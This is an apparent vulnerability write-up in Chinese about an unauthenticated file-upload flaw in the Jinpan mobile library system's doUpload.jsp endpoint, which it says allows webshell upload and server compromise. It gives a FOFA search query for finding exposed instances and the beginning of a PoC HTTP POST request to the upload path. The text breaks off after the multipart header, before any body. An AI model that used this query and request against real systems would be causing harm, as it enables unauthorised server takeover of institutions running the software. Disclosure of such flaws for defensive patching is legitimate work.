0x01 产品简介
金盘移动图书馆系统是金盘软件为图书馆和阅读者提供便捷服务的软件系统,可管理图书、提供借阅和归还功能,以及提供阅读者个人信息管理和图书检索服务。
0x02 漏洞概述
金盘移动图书馆系统 doUpload.jsp接口处存在文件上传漏洞,未经身份验证的攻击者可以利用此漏洞上传webshell,执行恶意代码指令,导致服务器失陷。
0x03 复现环境
FOFA:app="金盘软件-金盘移动图书馆系统"
0x04 漏洞复现
PoC
POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
--